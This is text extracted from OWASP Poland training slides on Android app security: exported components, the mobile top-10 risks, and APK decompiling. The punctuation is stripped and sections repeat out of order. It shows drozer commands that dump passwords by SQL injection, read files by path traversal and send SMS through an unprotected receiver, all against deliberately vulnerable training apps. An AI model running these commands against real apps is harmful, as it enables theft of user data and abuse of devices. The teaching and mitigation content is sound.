Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
